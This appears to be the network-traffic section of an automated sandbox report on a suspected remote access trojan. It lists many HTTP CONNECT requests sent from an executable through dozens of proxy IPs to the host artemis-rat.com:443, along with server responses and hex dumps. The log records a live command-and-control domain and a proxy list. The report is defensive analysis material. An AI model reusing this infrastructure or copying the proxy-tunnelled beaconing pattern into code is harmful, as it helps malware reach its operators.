                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2163192.168.2.553292103.125.154.23380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.279284954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2164192.168.2.5533418.222.239.209803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.285044909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389487028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.405348063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.405445099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2165192.168.2.555113184.170.245.14841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.287230968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2166192.168.2.555463206.220.175.241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.320280075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2167192.168.2.553456192.163.202.88609643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.344108105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389483929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.405354023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.405445099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2168192.168.2.55489374.119.147.20941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.346424103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2169192.168.2.555332148.72.23.56600693876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.346513987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2170192.168.2.553441162.241.158.204606513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.346649885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.905112982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702112913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.092776060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2171192.168.2.555229115.89.203.59803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.353971958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.514379978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.608313084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.713973045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2172192.168.2.553474159.203.13.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.354130030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389525890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.405352116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.405653000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2173192.168.2.555493193.239.58.9280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.354494095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2174192.168.2.553484159.89.194.121603223876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.355099916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2175192.168.2.553501122.116.150.290003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.359977961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2176192.168.2.555305103.179.182.15988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.360167980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.809405088 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2177192.168.2.555355162.214.165.203803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.360169888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.514615059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.608315945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.713964939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2178192.168.2.55348849.48.64.13080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.360577106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.990056992 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2179192.168.2.554075147.75.34.86100083876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.360578060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.663963079 CET356INHTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: Zscaler/6.3
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2180192.168.2.55549636.93.157.4956783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.367409945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2181192.168.2.553455180.183.113.9980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.367537022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.749325037 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2182192.168.2.555178192.111.130.5170023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.418725014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2183192.168.2.55363051.158.119.71163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.433968067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.498780966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.595140934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.701941967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
